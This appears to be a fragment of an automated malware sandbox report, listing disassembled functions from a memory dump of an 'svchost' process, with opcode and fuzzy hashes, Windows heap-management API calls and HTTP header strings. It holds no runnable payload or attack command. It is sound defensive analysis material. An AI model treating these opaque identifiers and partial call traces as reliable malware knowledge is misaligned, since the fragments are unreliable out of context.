                                                                                                                                                                                                              • API String ID: 2461973751-2008761856
                                                                                                                                                                                                              • Opcode ID: 0eace4bf437790750faf1bb1bfb6e8a241031d76e03336fb0e7964da5b081ec6
                                                                                                                                                                                                              • Instruction ID: 18c64e0883382e8afce590133cb200b92cd4a87257bf4b04c837307353d3158a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eace4bf437790750faf1bb1bfb6e8a241031d76e03336fb0e7964da5b081ec6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8B092B1B8071063FA243BA46D068193BA91989E46B640A4F7E03109456DE240A0AA7F
                                                                                                                                                                                                              Function 0266B0A0 Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1480856625-0
                                                                                                                                                                                                              • Opcode ID: 714f7d9d16f543a9ca4e5511433a4dbc920ad186850795b34930e29f46c7e065
                                                                                                                                                                                                              • Instruction ID: 1cb402fa4ebcc071c49f1ddd739829b2d47041da39278283446785ea81da5454
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 714f7d9d16f543a9ca4e5511433a4dbc920ad186850795b34930e29f46c7e065
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E821CDB06013059FD710CF2AC884A56FBE8FF98310F15C5AAE5488B362D7B1E810CFA0
                                                                                                                                                                                                              Function 0264EAE0 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,0264EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 0264EB1F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0264EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 0264EB26
                                                                                                                                                                                                              • memset.MSVCRT ref: 0264EB36
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,00000014,?,0264EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000), ref: 0264EB41
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: 4aa42d2240c8b511050c1e6db9fa986fa0a119d788ebc6d92d33e719687abb43
                                                                                                                                                                                                              • Instruction ID: 30565708e0fadad7504727006370601ea65a54f9f6612b5af108558572014038
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4aa42d2240c8b511050c1e6db9fa986fa0a119d788ebc6d92d33e719687abb43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9012B336006156BD7109A689C84FABB7DCBF46760B054701FD46CB280EF22E904C3E0
                                                                                                                                                                                                              Function 0264F370 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,0264FA2B,?,?,?), ref: 0264F388
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0264FA2B,?,?,?), ref: 0264F38F
                                                                                                                                                                                                              • memset.MSVCRT ref: 0264F39F
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,0264FA2B,?,?,?), ref: 0264F3AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: d8e15389836ec57e5fbf111d720d65708dd23c55e9d51d1e090a444142fd75ab
                                                                                                                                                                                                              • Instruction ID: fcfc2cfaf8c56a607bf6048164ec52e763f1b75c4e2aee92e46c145640fbe4c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8e15389836ec57e5fbf111d720d65708dd23c55e9d51d1e090a444142fd75ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0E533A0161177D7216AA99C84F8F775CEF86764F414714FE04EB281DE24D81087F5
                                                                                                                                                                                                              Function 02684130 Relevance: 5.0, APIs: 4, Instructions: 24memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02684145
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02684148
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02684155
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02684158
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: d5d89577a44ada35ca739d47cab8698a53907354775fa709c88cb0aa03da6b8d
                                                                                                                                                                                                              • Instruction ID: 5eaeebfcf463271452c82bac82b869153f4d1bd45388fd235f8feaf75a9e7ac0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5d89577a44ada35ca739d47cab8698a53907354775fa709c88cb0aa03da6b8d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEE08C32A4122873C6203AA66C08FAFBF1CEF91B61F428611F60AA32408A619410C6F1